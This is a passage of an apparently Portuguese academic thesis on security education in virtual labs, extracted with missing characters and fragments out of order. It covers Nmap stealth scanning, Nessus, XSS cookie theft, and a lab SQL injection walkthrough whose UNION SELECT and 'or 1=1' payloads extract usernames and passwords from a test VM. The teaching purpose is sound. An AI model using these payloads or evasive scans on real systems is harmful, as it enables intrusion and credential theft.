26. da aplica o do usu rio Quando se usa o servidor SQL para executar comandos que interagem com o sistema operacional o processo ir executar com as mesmas permiss es do componente que executou o comando o qual frequentemente tem um n mero maior de permiss es CLARKE 2009 p 7 Consequ ncias de um ataque SQL Injection Se um atacante pode controlar a entrada que enviada para uma requisi o SQL e manipula essa entrada de forma que o dado seja interpretado como c digo ao inv s de dado ent o o atacante pode executar c digo no banco de dados CLARKE 2009 p 13 De acordo com a OWASP D 2011 um ataque de inje o SQL realizado com sucesso pode ler dados importantes de um banco de dados modifica los inserir novos dados e at apag los 41 Em servi os web que n o possuem o devido tratamento de exce o a mensagem de erro pode conter dados valiosos para o atacante utilizar Assim atrav s de tentativa e erro o atacante pode descobrir que tecnologia de banco de dados est sendo utilizada que tabelas existem que podem ser exploradas e todas as informa es necess rias para efetuar um ataque BRINHOSA R B WESTPHALL C B WESTPHALL 2011 p 5 A figura 5 mostra um cen rio no qual um erro n o tratado foi emitido revelando informa es sobre o tipo de banco de dados utilizado ERROR The query was not accomplished Description y error in your SQL syntax check the manual that rs MySQL serve
27. da rede a encontrarem portas abertas que podem comprometer a seguran a de um terminal isolado ou de uma rede ou parte dela bem como por pessoas mal intencionadas a procura de portas abertas na rede as quais poder o ser exploradas e servirem de portas de entrada para ataques rede Segundo GREGG 2008 p 122 a varredura de portas foi questionada quanto a sua legalidade nos Estados Unidos Enquanto que para alguns a varredura de portas era considerada crime para outros esta pr tica n o poderia ser considerada crime uma vez que n o traria preju zo algum ao alvo A quest o de ser ou n o ser considerada crime a pr tica da varredura de portas discutida at hoje pois apesar de n o trazer preju zos diretos ao alvo pode levar 52 uma exposi o de falhas de seguran a do elemento varrido Devido a este tipo de exposi o que pode facilitar e at levar a um ataque varrer portas uma pr tica que s deve ser feita em redes sob sua jurisdi o ou com a concess o de autoriza o para tal ato A varredura de redes n o autorizadas pode ser considerado ilegal e o autor da pr tica poder estar sujeito a multas e penalidades determinadas de acordo com a legisla o local vigente A Ferramenta O NMAP uma ferramenta de c digo aberto para explora o de rede e auditoria de seguran a o qual serve tanto para varrer redes amplas bem como hosts individuais Utilizando pacotes IP em estado bruto pacote IP sem modifica
28. de c digo de ativa o do Nessus 8 Sera necessario concordar com os termos e em seguida clicar em AGREE 9 Preencha seu nome e e mail para receber o c digo de ativa o 10 Insira o c digo de ativa o e aguarde at que o Nessus fa a o download dos plugins mais atuais 11 Entre com o login e senha do administrador para criar um outro usu rio 12 Clique em Users e em seguida em Add 13 Escolha um nome de usu rio e uma senha e em seguida clique em Submit certifique se de n o ter marcado a caixa de sele o Administrator 14 Pronto Agora basta utilizar a interface Web Server do Nessus com o novo usu rio criado para realizar as varreduras por vulnerabilidades Se voc ainda n o iniciou o Nessus servidor inicialize o em um terminal de comandos do Ubuntu atrav s do comando sudo etc init d nessusd start em seguida acesse a interface Web Server do Nessus atrav s do navegador web em https ubuntu 8834 Para testar o Nessus iremos realizar aqui 3 tarefas sequenciais que s o Definir as pol ticas que o Nessus ir utilizar para fazer a varredura realizar a varredura propriamente dita de acordo com as pol ticas definidas e por fim analisar os resultados obtidos 95 Tarefa 1 Definir as politicas Nesta tarefa vamos analisar as politicas existentes do Nessus e tamb m criar nossas pol ticas para executar as nossas varreduras Entretanto a cria o de pol ticas no Nessus n o uma tarefa por defi
29. enviar e baixar resultados de varreduras ver figura 25 No relat rio poss vel selecionar hosts em uma lista para ver mais informa es sobre o host como o n mero de portas abertas o protocolo e servi os utilizados em cada porta informa es do sistema operacional al m de um resumo das vulnerabilidades encontradas categorizadas pelo grau de risco O Nessus ir indicar ainda para cada vulnerabilidade listada no relat rio uma a o para corrigir o problema alem de listar uma sinopse uma descri o t cnica o fator de risco a pontua o CVSS Common Vulnerability Scoring System resultados relevantes que demonstram a conclus o refer ncias externas data de publica o da vulnerabilidade data de publica o modifica o do plugin e disponibilidade da explora o 67 5 O uso de virtualiza o no ensino de seguran a 5 1 O que virtualiza o Segundo Gregg 2008 p 47 Virtualiza o o processo de emular hardware dentro de uma m quina virtual O processo de emula o de hardware duplica a arquitetura f sica necess ria na m quina para o funcionamento dos programas e processos Uma m quina virtual cont m seu pr prio sistema operacional bibliotecas e aplicativos e totalmente independente e isolada das demais OLIVEIRA CARISSIMI TOSCANI 2010 p 296 A empresa VMWare 2012 explica o funcionamento da virtualiza o como A virtualiza o permite executar v rias m quinas virt
30. essenciais no cen rio atual NAKAMURA GEUS 2007 p 301 Atrav s de um processo de crifragem os dados passam por um algoritmo criptogr fico que transforma a mensagem original leg vel plaintext em um conjunto de dados ileg vel cyphertext Posteriormente um processo de decifragem transforma o conjunto de dados ileg vel cyphertext novamente em texto original e leg vel NAKAMURA GEUS 2007 p 301 Tanto para cifrar quanto para decifrar mensagens utilizamos uma chave para alimentar o algoritmo Dependendo do algoritmo podemos ter 2 metodologias distintas para o sistema de criptografia e Sim trica ou sistema criptogr fico de chave secreta Nesta abordagem o algoritmo criptogr fico o mesmo tanto para cifrar quanto para decifrar as mensagens e em ambos os casos utiliza se a mesma chave para efetuar a opera o Por isso a chave utilizada chamada de chave secreta pois somente as partes envolvidas devem ter conhecimento da chave e Assim trica ou sistema criptogr fico de chave p blica Nesta abordagem algoritmo criptogr fico diferente para o processo de cifragem decifragem da mesma forma como as chaves utilizadas em ambos os algoritmos tamb m s o diferentes Neste sistema criptogr fico toda entidade possui um par de chaves sendo uma a chave privada e a outra a chave p blica A chave privada deve ser de conhecimento apenas da entidade que a possui A divulga o desta chave acarretaria na viola o da s
31. foi projetada levando se em conta a melhoria do desempenho pois pode ser usada para verificar redes internas de grande porte com muitos hosts v rios servi os expostos e sistemas incorporados como impressoras Os plugins CGI Abuse n o est o ativados e um conjunto de portas padr o examinado mas n o todas as 65 535 e Testes de aplicativos da Web Esta pol tica de varredura utilizada para verificar os sistemas fazendo com que o Nessus detecte vulnerabilidades 63 conhecidas e desconhecidas nos aplicativos da Web Os recursos de difusao do Nessus sao ativados com esta politica o que fara com que o Nessus detecte todos os sites descobertos e verifique as vulnerabilidades presentes em cada um dos par metros incluindo XSS SQL inje o de comandos e v rios outros Preparar para auditorias de PCI Payment Card Industry DSS Data Security Standard Esta pol tica ativa as verifica es de conformidade com a norma PCI DSS integradas compara os resultados das varreduras aos padr es PCI e gera um relat rio sobre o comportamento da conformidade importante observar que uma varredura de compatibilidade bem sucedida n o garante a conformidade nem uma infra estrutura segura As organiza es que estejam se preparando para uma avalia o da PCI DSS podem usar essa pol tica para preparar suas redes e seus sistemas para a conformidade com a PCI DSS Op es de Varredura O Nessus permite que a varredura scan
32. garantir que as informa es computa o n o sejam divulgadas sem a apropriada autoriza o LANDWEHR 2001 p 6 Tamb m deve se garantir que a comunica o n o possa ser lida por terceiros n o autorizados VACCA 2009 p 243 Bishop 2004 p 2 define confidencialidade como o ocultamento de informa es ou recursos Para ele a necessidade de manter as informa es sigilosas prov m da utiliza o de computadores em campos sens veis como o governo e a ind stria A confidencialidade pode ser atacada de diferentes formas uma delas por exemplo atrav s da intercepta o de dados na qual um terceiro tamb m chamado de homem do meio intercepta a comunica o de dados entre as partes leg timas envolvidas e captura as informa es transmitidas Este tipo de ataque pode se dar atrav s da an lise do tr fego de uma rede VACCA 2009 p 244 Ainda analisando o tr fego da rede poss vel que o interceptador determine o conte do da comunica o atrav s de uma an lise do comportamento das transfer ncias de dados Por exemplo atividades na rede causadas por transfer ncias curtas de dados podem ser origin rias da emula o de um terminal ou de mensagens instant neas enquanto que atividades na rede causadas por transfer ncias longas e constantes de dados podem ser origin rias de uma videoconfer ncia VACCA 2009 p 244 Se imaginarmos um cen rio no qual a troca de um determinado tipo de mensagem
33. http www getmantra com download mantra security toolkit html gt Acessado em 8 de Maio de 2012 NAKAMURA Emilio Tissato GEUS Paulo L cio de Seguran a de Redes em Ambientes Cooperativos S o Paulo Ed Novatec 2007 ISBN 978 85 7522 136 5 131 NANCE Kara HAY Brian DODGE Ronald SEAZZU Alex BURD Steve Virtual Laboratory Environments Methodologies for Educating Cybersecurity Researchers Department of Computer Science University of Alaska Fairbanks Department of Electrical Engineering and Computer Science U S Military Academy Anderson School of Management University of New Mexico Methodological Innovations Online 2009 NMAP A Descoberta de Hosts Disponivel em lt http nmap org man pt_BR man host discovery html gt Acessado em 11 de Janeiro de 2012 B Download Dispon vel em lt http nmap org download html gt Acessado em 11 de Janeiro de 2012 NMAP Guia de Refer ncia do Nmap Disponivel em lt http nmap org man pt_BR gt Acessado em 11 de Janeiro de 2012 NMAP D T cnicas de Escaneamento de Portas Dispon vel em lt http nmap org man pt BR man port scanning techniques html gt Acessado em 11 de Janeiro de 2012 OLIVEIRA R mulo Silva de CARISSIMI Alexandre da Silva TOSCANI Sim o Sirineo Sistemas Operacionais 4 Edi o Editora Bookman Instituto de Inform tica da UFRGS Porto Alegre 2010 ISBN 978 85 7780 521 1 132 OWASP A
34. longest running It is powere and most respected vendor of widgets We Username hosted can supply your widget needs or provide you with reseller materials Whatever your Got Qu Feel free to interest in widgets we re here to help you any help Password Our dedicated staff of professionals can provide 24 7 widget support We make sure your widgets widget properly and take the headache out of widget deployment We can help you train your own staff of widgeters or widget your widgets for you We have financing so that we can meet your widget needs regardless of your budget Contact a sales representative now lt gt Edit input td tr lt tbody lt table fieldset form lt div coll div colleft div colmid div colmask body html div id header gt 2 nso HTML CSS DOM 5 lu Inline Co lt div class colmask threecol gt lt div class colmid gt div class colleft gt div class coll gt lt hZ gt Log In lt h2 gt lt p gt lt p gt lt form gt lt p gt lt p gt lt div gt Fl lt div nlece onlZ Figura 32 Inspegao de elemento no Firebug Podemos observar no c digo da figura 32 que o formul rio de login verificado a partir de um Javascript o que n o recomendado para a preven o de ataques de inje o SQL pois podem ser contornados Para conseguirmos realizar nosso ataque com sucesso teremos que desviar desta verifica
35. o de taxa e diminui o ritmo de acordo para evitar inundar a rede com pacotes in teis que a m quina alvo ir descartar sA scan TCP ACK Esse tipo de varredura nunca determina se uma porta est aberta ou mesmo aberta filtrada e utilizada para mapear conjuntos de regras do firewall determinando se eles s o orientados conex o ou n o e quais portas est o filtradas Existem ainda outras t cnicas de varredura de portas utilizando o NMAP que nao ser o abordadas aqui mas que podem ser acessadas diretamente em D 2012 Especifica o de Portas e Ordem da Varredura poss vel definir no NMAP quais portas devem ser varridas e se a ordem aleat ria ou sequencial Para isso poss vel especificar algumas op es p lt faixa de portas gt Varreria apenas as portas especificadas As portas individuais a serem varridas devem ser passadas como par metro separadas por v rgula ex p 137 139 8080 enquanto que faixas de portas a serem varridas devem ser separadas por h fen ex p 53 137 F Scan R pido portas limitadas Especifica que voc deseja varrer apenas as portas listadas no arquivo nmap services que vem com o NMAP ou o arquivo de 60 protocolos para o sO tornando a varredura mais rapida do que varrer todas as 65535 portas de um host r Nao usa as portas de forma aleatoria Por padrao o NMAP varreria as portas em uma ordem aleat ria Esta op o diz ao NMAP para varrer as porta
36. op es de performance da varredura que podem ser conferidas no guia do usu rio do Nessus TENABLE D 2012 Plugins Um plugin um simples programa que faz verifica es para uma dada falha TENABLE E 2012 Os plugins do Nessus s o escritos em uma linguagem chamada NASL Nessus Attack Scripting Language e se ligam a cada porta especificada para fazerem as verifica es procura de falhas O Nessus realiza os testes de seguran a nos alvos atrav s do uso de plugins e oferece plugins agrupados em fam lias para que o usu rio possa escolher plugins individuais espec ficos ou at fam lias inteiras para incluir na varredura Desta forma poss vel criar sele es diferentes de plugins a serem utilizados para cada varredura criando novas pol ticas de varredura 66 Novas vulnerabilidades sao descobertas diariamente e com elas novos plugins surgem para atender as novas necessidades de varredura A arquitetura de plugins permite ao usuario do Nessus de forma facil e rapida incluir ou excluir novos testes de seguran a em sua varredura Caso um plugin espec fico n o esteja dispon vel poss vel baix lo da Internet e anex lo varredura Relat rios Ap s realizar a varredura em uma rede o Nessus organiza as informa es coletadas durante a varredura e as apresenta ao usu rio em um relat rio detalhado e organizado A tela Reports Relat rios funciona como um ponto central para exibir comparar
37. sS para averiguar ambos protocolos na mesma execu o Ela funciona enviando um cabe alho UDP vazio sem dados para cada porta alvo Se um erro ICMP de porta inalcan vel tipo 3 c digo 3 retornado a porta est fechada Outros erros do tipo inalcan vel tipo 3 c digos 1 2 9 10 ou 13 marcam a porta como filtrada Ocasionalmente um servi o ir responder com um pacote UDP provando que a porta est aberta Se nenhuma resposta recebida ap s as retransmiss es a porta classificada como abertalfiltrada Isso significa que a porta poderia estar aberta ou talvez que filtros de pacotes estejam bloqueando a comunica o Varreduras de vers es sV podem ser utilizadas para ajudar a diferenciar as portas verdadeiramente abertas das que est o filtradas Um grande desafio com a varredura UDP faz la rapidamente Portas abertas e filtradas raramente enviam alguma resposta deixando o Nmap esgotar o tempo time out e ent o efetuar retransmiss es para o caso de a sondagem ou a resposta ter sido perdida Portas fechadas s o normalmente um problema ainda maior Elas 59 costumam enviar de volta um erro ICMP de porta inalcan vel Mas ao contr rio dos pacotes RST enviados pelas portas TCP fechadas em resposta a uma varredura SYN ou connect muitos hosts limitam a taxa de mensagens ICMP de porta inalcan vel por padr o O Linux e o Solaris s o particularmente rigorosos quanto a isso O Nmap detecta a limita
38. t m o direito de errar sem possivelmente causar um potencial preju zo fazemos os testes em ambientes controlados em um laborat rio 1 2 Descri o do problema Muitas vezes dif cil encontrar o foco de um problema espec fico rapidamente em sistemas computacionais que s o sistemas na maior parte das vezes complexos Sistemas complexos envolvem um n mero muito grande de vari veis o que os torna complexos e por n o se ter o total controle sobre estas vari veis que encontramos barreiras diariamente para solucionar um determinado problema No mundo real diversos problemas podem acontecer simultaneamente em um sistema computacional ao mesmo tempo em que um n mero muito grande de vari veis podem ser alteradas por diversos fatores aleat rios Em cen rios como estes o fator de aleatoriedade muitas vezes predomina o que n o nos permite ter uma total certeza sobre o que realmente est causando o problema no sistema A realiza o de um teste ou de um experimento em laborat rio nos permite na maior parte das vezes isolarmos certas condi es garantindo que todas as outras vari veis ou a maior parte delas sejam sempre previstas ou pelo menos controladas Assim podemos testar apenas o objeto em estudo sem nos preocupar com fatores externos que possam influenciar o resultado do teste Como no aprendizado de seguran a computacional muitas vezes queremos apenas testar ou experimentar um problema isoladamente a utiliza o de um
39. utilizado no banco de dados Vamos agora listar todas as tabelas do banco de dados 10 Modifique o endere o da hackbar trocando a tabela 2 por table name e acrescentando from information schema tables ao final O endere o deve ficar http 192 168 6 135 id 01 UNION SELECT 1 table_name 3 4 5 6 7 from information schema tables A p gina ir exibir a lista de tabelas existentes no banco de dados Vamos analisar a tabela user 11 Modifique o endere o da hackbar trocando a tabela 2 por column name a cl usula from por from information schema columns e adicione a cl usula where com a condi o table name user 115 O endere o deve ficar http 192 168 6 135 id 01 UNION SELECT 1 column_name 3 4 5 6 7 from information schema columns where table name user A p gina exibe desta vez somente as colunas da tabela users Observe a presen a de colunas interessantes como user username e user password Vamos obter essas informa es 12 Modifique o endere o da hackbar trocando a tabela 2 por user username e uma outra tabela vulner vel como a 3 por exemplo por user password Modifique o final da instru o para from user de forma a extrair os dados da tabela user O endere o deve ficar http 192 168 6 135 id 01 UNION SELECT 1 user username user password 4 5 6 7 from user Observe que agora a p gina exibe o nome do usu rio
40. 68 6 133 host down Nmap scan report for 192 168 6 134 Host is up 0 00087s latency MAC Address 00 0C 29 CC F2 FA VMware Nmap scan report for 192 168 6 135 host down Nmap scan report for 192 168 6 136 host down Nmap scan report for 192 168 6 137 host down Nmap scan report for 192 168 6 138 host down Figura 12 Exemplo 2 de sa da do NMAP Situa o 3 Tome por base a situa o 2 mas desta vez suponha que a rede nao de sua propriedade e que voc deve evitar ao m ximo levantar suspeitas de que a rede est sendo varrida Neste caso nao podemos simplesmente disparar uma varredura pela rede utilizando a op o sP como utilizamos na situa o anterior porque o fato de ela usar o ping convencional para a descoberta de hosts torna esta op o facilmente detect vel por um firewall da rede por exemplo Para resolver este problema o Nmap nos oferece algumas op es diferenciadas para o uso do ping Nestas op es o Nmap utiliza se da estrat gia de n o completar a conex o com o host alvo para evitar a detec o Por exemplo na op o 5 pacotes TCP vazios s o enviados com flag SYN marcada para uma porta do host alvo A flag SYN indica aos sistemas remotos que voc est tentando estabelecer uma comunica o Caso esta porta esteja fechada vamos receber um pacote RST de volta indicando o fim do processo de handshake como mostra a figura 13 84 Porta do alvo fechada TCP SYN
41. 7 Par metro CC utilizado na figura 6 OWASP E 2012 49 A consequ ncia desta a o como mostrada na figura 6 e 7 o roubo de sess o do usu rio o qual ter os valores do cookie associado a este documento enviados para o site do atacante OWASP E 2012 O conte do malicioso enviado para o navegador do usu rio frequentemente est o na forma de um segmento de JavaScript mas podem tamb m incluir HTML Flash ou outros tipos de c digos que o navegador possa executar A variedade de ataques baseados em XSS quase ilimitada mas comumente incluem a transmiss o de dados privados como cookies ou outras informa es de sess es ao atacante redirecionando a v tima ao conte do da web controlado pelo atacante ou ainda executando a es maliciosas na m quina do usu rio guiadas pelo site vulner vel OWASP B 2011 Para o CGI Security 2012 um ataque de Cross Site Scripting ocorre quando uma aplica o coleta dados maliciosos de um usu rio O dado normalmente coletado na forma de link o qual cont m conte do malicioso em si mesmo O usu rio na maior parte das vezes clicar neste link em um outro web site em uma mensagem instant nea ou at mesmo em um e mail comum que o atacante codifique a parte maliciosa do link em HEX hexadecimal ou outros m todos de codifica o para evitar levantar suspeitas de que o link fraudulento Depois que os dados s o coletados pela aplica o web uma p gina de sa da dos d
42. 7 q 0 7 Connection keep alive Referer http 192 168 6 135 index php action login Cookie PHPSESSID alalavov nv2caf6ejr9pv7287 x insight activate Content Type application x www Form urlencoded Content Length 29 username teste amp password teste 1 1 200 Date Thu 12 Apr 2012 02 34 44 GMT lt Save All Replay Capture Figura 34 Live HTTP headers 109 9 Selecionando a linha que cont m estas informa es clique no bot o Replay Nesta janela poderemos editar as informa es de login e senha e reenvi las ao servidor sem que elas sejam filtradas pelo Javascript como estava ocorrendo anteriormente Quando os dados s o enviados ao banco de dados e as instru es s o constru das dinamicamente e sem parametriza o poss vel enganar o banco de dados e ao inv s de mandar apenas um nome como usu rio mandar um nome seguido de um complemento para a instru o Instru o normal usernamez usuario Instru o com inje o de c digo SQL username usuario 1 1 Resultado da instru o username usuario or 1 1 amp Figura 35 Exemplo de inje o de c digo SQL Por exemplo na figura 35 ao simplesmente digitar o nome de um usu rio o banco de dados ir coloc lo entre aspas simples para gerar a instru o desejada e retornar o resultado correto do banco de dados Mas se ao inv s disso digitarmos usu rio 1
43. FC 7820N printer 91 Brother MFC 94Z0CN printer 91 Kapsch electronic toll collection system 91 Ness M1 XEP home automation interface 91 Novatel MiFi 2200 3G WAP 91 No exact OS matches for host test conditions non ideal Network Distance 1 hop TRACEROUTE HOP RIT ADDRESS 1 1 62 ms 192 168 6 2 Read data files from C Arquivos de programas Nmap 05 and Service detection performed Please report any incorrect results at http nmap org submit Nmap done 1 IP address 1 host up scanned in 6 88 seconds Raw packets sent 1020 47 708KB Revd 1010 40 880KB Filter Hosts Figura 10 Exemplo 1 de sa da do NMAP Como podemos observar na figura 10 a sa da do Nmap mostra na tabela de portas que a porta de n mero 53 utiliza o protocolo TCP encontra se no estado filtrada isso significa que existe um filtro firewall ou algum outro obst culo na rede bloqueando a porta de forma que o Nmap n o consegue determinar se a porta est aberta ou fechada e o servi o que est ouvindo nesta porta um servidor de nomes de dominios domain como aparece no nome do servi o 81 Sabemos que a porta esta aberta pois em se tratando de um servi o de DNS que est ouvindo nesta porta ele deve estar sempre atento para o caso de algum IP solicitar alguma tradu o de endere os Situa o 2 Executando o n mero m ximo de m quinas virtuais na rede que voc puder suponha que voc desc
44. INIDAS DO NESSUS I n 95 FIGURA 25 TEEX DERELATORIOS DO INESSUS petet nen esent ede br aere ie ye li a pasa 100 FIGURA 26 SELE O DA OP O HOST SUM MARY NO NESSUS eee enne nnne neni nnne 101 FIGURA 27 EXPLORANDO RELAT RIOS NO 5505 101 FIGURA 28 DETALHAM ENTO DE RELAT RIOS NO 5505 444 102 FIGURA 29 COMO ABRIRA SQL INJECT ME SIDEBAR MANTRA 104 FIGURA 30 SQLINJECT ME SIDEBAR eostedsulaeccedget imita dad SANA ecce funky 105 FIGURA 31 COMO ABRIR O FIREBUG NO 40 106 FIGURA 32 INSPE O DE ELEM ENTO NO nenne 107 FIGURA 33 COMO ABRIR O LIVE HTTP HEADERS NO 108 FIGURA 34 BIVE HUT P HEADERS ASSET SSES Ska a ug s Sa umapa qa Tau s 108 FIGURA 35 EXEM DE INJE O DE C DIGO SQL sess nennen nennen nnne neni nnne annes 109 FIGURA 36 ERRO OBTIDO AO TENTAR INJETAR C DIGO SQL l I n nnne nnne nnne nnn nnn nennen 110 FIGURA 37 COMO ABRIR A HACKBAR NO
45. KESAVAN Anita Foundations of Security What every Programmer Needs to Know 2007 ISBN 13 pbk 978 1 59059 784 2 ISBN 10 pbk 1 59059 784 2 E Consulting Corp 2011 Disponivel em lt http www e consultingcorp com br knowledge indicadores de mercado varejo online vol gt Acesso em 30 de Junho de 2011 GREGG Michael Build Your Own Security Lab A Field Guide for Network Testing Publicado por Wiley Publishing Inc Indianapolis Indiana 2008 ISBN 978 0 470 17986 4 HARRIS Shon HARPER Allen EAGLE Chris NESS Jonathan LESTER Michael Gray Hat Hacking The Ethical Hacker s Handbook Publicado por McGraw 130 Hill Osborne 2100 Powell Street 10 Floor Emeryville California 94608 U S A 2005 ISBN 0 07 225709 1 ISSO IEC 27005 International Standard Information technology Security techniques Information security risk management Numero de refer ncia ISO IEC 27005 2008 E Suiga 2008 KNUDSEN Jonathan B Java Cryptography Editora O Reilly 1998 ISBN 1 56592 402 9 LANDWEHR Carl E Computer Security Mitretek Systems 7525 Colshire Drive McLean VA 22102 USA Publica o Online 27 jul 2001 Springer Verlag 2001 LAUREANO Marcos Aur lio Pchek MAZIERO Carlos Alberto Virtualiza o Conceitos e Aplica es em Seguran a Pontificia Universidade Cat lica do Paran Centro Universit rio Franciscano 2008 MANTRA Download Mantra Security Toolkit Dispon vel em lt
46. LANGUAGE SSL SECURE SOCKET LAYER SWEET SECURE WEB DEVELOPM ENT TEACHING SYN SYNCHRONIZE TCP TRANSMISSION CONTROL PROTOCOL TLS TRANSPORT LAYER SECURITY TTL TIME TO LIVE UDP USER DATAGRAM PROTOCOL VM VIRTUAL M ACHINE VPN VIRTUAL PRIVATE NETWORK XSS CROSS SITE SCRIPTING LISTA DE FIGURAS FIGURA 1 CRESCIM ENTO DO VAREJO ONLINE E CONSULTING CORP 2010 enne 19 FIGURA 2 TOTAL DE INCIDENTES REPORTADOS AO CERT BR POR ANO CERT 2011 21 FIGURA ESQUEM A RELACIONANDO EA AS ATAQUES E VULNERABILIDADES OW ASP C 2011 24 FIGURA 4 TOTAL DE VULNERABILIDADES IDENTIFICADAS 2006 2010 SYMANTEC 2011 a 21 FIGURA 5 EXEM PLO DE ERRO N O TRATADO BRIN HOSA B WESTPHALL C B WESTPHALL 2011 P 5 41 FIGURA 6 CEN RIO PASS VEL DE ATAQUE XSS OW ASP 200 48 FIGURA 7 PAR METRO UTILIZADO NA FIGURA 6 OWASP 200 48 FIGURA 8 CEN RIO DE M QUINAS VIRTUAIS ee en rernm ni enne riter deren ri ntn inn 76 FIGURA 9 COM PONENTES DE INSTALA O DO NMAP ccccsessscesesseeseceseeeseeeecesueesesseeceuseseeesesassssasssscaeessseessasesssaees 78 FIGURA 10 EXEMPLO T DESA DA oot aee tee tae ee oot o rod ud 80 FIGURA 11 ENDERE O DAS AQUINAS VIRTUAIS nennen nennen nennen nnns nnn
47. MEINEL 2011 p 408 Levando em considera o a vis vel import ncia de ambientes virtuais para a consolida o da pr tica do treinamento em seguran a Willems Klingbeil Radvilavicius Cenys e Meinel 2011 p 408 desenvolveram o projeto Tele Lab O projeto Tele Lab oferece um sistema para treinamento em seguran a em um ambiente de laborat rio virtual remoto online e acess vel por qualquer um A plataforma Tele Lab oferece um ambiente de aprendizado individual para cada estudante que consiste em at 3 m quinas virtuais por ambiente de aprendizado 5 4 A emula o do ataque De acordo com Harris Harper Eagle Ness e Lester 2005 p 73 o ato de varrer sondar e explorar redes a procura de vulnerabilidades que podem comprometer a rede ou os seus hosts chamado de teste de penetra o O primeiro objetivo de um teste de penetra o se apropriar da rede o segundo objetivo se apropriar da rede de quantas formas diferentes voc conseguir para que ent o seja poss vel descobrir cada falha encontrada ao consumidor ou usu rios da rede O teste de penetra o em uma rede uma excelente forma de testar a efic cia das medidas de seguran a de uma organiza o e de expor as falhas de seguran a da rede Uma vez que administradores de redes engenheiros e profissionais de seguran a entendam como os atacantes agem ent o eles podem emular suas atividades para simular um teste de penetra o til A emula o de u
48. Ponnapalli Varadarajan completa a defini o de Bishop qualquer parte da informa o deve estar dispon vel para os usuarios autorizados quando eles precisarem BELAPURKAR CHAKRABARTI PONNAPALLI VARADARAJAN 2009 p 45 A disponibilidade um fator importante para a constru o da confiabilidade pois um sistema indispon vel t o ruim quanto n o ter sistema algum BISHOP 2004 p 4 A disponibilidade pode ser afetada algumas vezes por fatores f sicos como uma falha de disco ou at mesmo por fatores de comunica o como erros de transmiss o ou interrup o do canal de comunica o Entretanto um dos ataques 32 mais cl ssicos disponibilidade a nega o de servi o DoS Denial of Service no qual o atacante utiliza um ou mais computadores para atacar um alvo requisitando muitas conex es com o servidor alvo e fazendo o chegar ao seu limite m ximo de oferta de conex es at que ent o o servidor passa a recusar novas conex es BELAPURKAR CHAKRABARTI PONNAPALLI VARADARAJAN 2009 p 45 2 3 4 Autenticidade A propriedade de autenticidade deve garantir que cada indiv duo quem ele alega ser LANDWEHR 2001 p 6 A utiliza o de senhas como nico meio de prote o sistemas de seguran a j n o mais suficiente para manter a seguran a quando se trata de aplicativos e sistemas cr ticos ou de alta import ncia como por exemplo a efetiva o de transa es banc rias onl
49. SHOP 2004 p 3 Quando tratamos de uma transa o online a integridade um fator chave pois h a necessidade da garantia de que um dado enviado por um remetente A chegue ao destinat rio B sem que tenha sido modificado durante o percurso O dado precisa ser v lido e estar correto al m disso necess rio tamb m que o destinat rio B possa ter certeza de que o dado enviado partiu do remetente A garantia de 31 autenticidade A viola o integridade pode se dar por diversos fatores tais como a intercepta o e viola o expl cita dos dados erros de transmiss o v rus ou at mesmo por problemas causados por desastres naturais Como formas de garantir a integridade dos dados podemos utilizar t cnicas como autentica o e assinatura digital BELAPURKAR CHAKRABARTI PONNAPALLI VARADARAJAN 2009 p 44 A checagem da integridade das mensagens transmitidas importante para impedir a aceita o de mensagens modificadas por um terceiro ataque do homem do meio ou a aceita o de mensagens de uma fonte que n o seja leg tima VACCA 2009 p 244 2 3 3 Disponibilidade A propriedade de disponibilidade deve garantir que as informa es na computa o estejam dispon veis para autenticar usu rios quando solicitado LANDWEHR 2001 p 6 Bishop 2004 p 4 define disponibilidade como a habilidade de utilizar a informa o ou recurso desejado Entretanto a afirma o de Belapurkar Chakrabarti
50. SIMI TOSCANI 2010 p 298 Usando os servi os oferecidos por uma determinada interface de sistema a camada de virtualiza o constr i outra interface de mesmo n vel de acordo com as necessidades dos componentes de sistema que far o uso dela A nova interface de sistema vista atrav s dessa camada de virtualiza o denominada m quina virtual LAUREANO MAZIERO 2008 p 6 A virtualiza o foi amplamente adotada pela IBM nos anos 60 para permitir que um nico mainframe pudesse comportar m ltiplos sistemas operacionais com seus diferentes usu rios Em 1990 a virtualiza o volta a ganhar visibilidade e em 2000 passa a ser largamente utilizada na emula o de servidores permitindo o funcionamento de v rios servidores em poucas m quinas f sicas Desta forma reduziram se os custos com os equipamentos utilizados e aumentaram a escalabilidade e flexibilidade dos servidores A virtualiza o ainda encontrou uso no desenvolvimento de software com a finalidade de testar novos software em diferentes sistemas operacionais e plataformas de hardware Al m disso a tecnologia de virtualiza o encontrou uma crescente aplica o como componente chave dos modelos de cloud computing e no ensino a dist ncia NANCE HAY DODGE SEAZZU BURD 2009 p 5 In meros programas podem ser usados na virtualiza o de sistemas tais como VMWare Virtual PC Open VZ entre outros Dependendo da quantidade de 69 recursos de hardware disponi
51. Security 9 Compass SQL Inject Me SQL Inject Me lets you test the page you re viewing For SQL Injection vulnerabilities Each tab represents a Form on the page and lists all the Fields Just Fill in good values For all the Fields and mark which ones are to be tested they will become yellow then click either Test with All Attacks or Test with Top Attacks Test all Forms with all attacks Test all Forms with top attacks loginForm Execute Run all tests v Log In y password Change this to the value you want tested w username Change this to the value you want tested w Change this to the value you want tested w Figura 30 SQL Inject Me Sidebar Os resultados apresentados ap s o teste nos mostram que a p gina n o est vulner vel a ataques de inje o SQL de acordo com os v rios testes realizados pela ferramenta como a inje o de strings 1 OR 1 1 para tentar enganar o banco de dados Isso quer dizer que a p gina est filtrando os dados para prevenir tais ataques Em seguida vamos tentar descobrir que tipo de filtro a p gina est utilizando para tentar contorn lo Para isso iremos utilizar outra ferramenta chamada Firebug 5 Abra o Firebug seguindo o seguinte caminho Web Developer gt Firebug gt Open Firebug como mostra a figura 31 I o CTF 6 Widgets Inc can supply your wi gt Character Encoding with reseller materi Work Offline New Tab Tools Start Pr
